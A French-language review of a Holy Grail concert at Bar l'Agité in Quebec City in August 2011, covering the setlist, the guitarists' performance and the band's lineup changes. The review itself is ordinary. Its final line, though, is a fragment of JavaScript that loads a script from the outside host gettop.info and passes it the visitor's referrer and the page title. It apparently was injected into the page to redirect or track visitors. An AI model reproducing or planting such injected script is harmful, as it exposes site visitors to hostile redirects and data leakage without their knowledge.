29 Août 2011, Bar l’Agité

C’est dans un léger brouhaha que la formation californienne à commencé sa prestation infernale. Le quintette explosif désormais formé de Tyler Meahl à la batterie, Blake Mount à la basse, Eli Santana et Alex Lee aux guitares et le flamboyant James-Paul Luna au chant nous ont livré une performance que la vieille Capitale n’est pas prête d’oublier de si tôt. Débutant le spectacle avec Immortal Man, la foule fût conquise en un tour de main. À mi-spectacle, la chanson titre de leurs derniers opus, Crisis in Utopia, fût tout qu’une démonstration de prouesses, d’acrobaties techniques performé par un duo de guitaristes enflammés en Eli Santana et Alex Lee. La foule québécoise n’a pu qu’admirer l’énergie dégagée par la formation américaine. Entre chaque morceau, James-Paul Luna s’assura de bien remercié son public survolté dans la langue de Molière, et bien entendu, My Last Attack fût violemment performé et assidument acclamé, le tout pour couronné un spectacle comme on en voit rarement ces jours-si.

Fait a noter, le changement à la formation originale, James Larue a été remplacer juste après le temps d’une saison par Ian White, qui fût officiellement remplacé par Alex Lee, qui n’a absolument rien à envier à ces prédécesseurs, et le bassiste Blake Mount qui faisait un retour avec la formation, prenant ainsi la place de Johnny Konesky.

myspace officiel de Holy Grail


s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;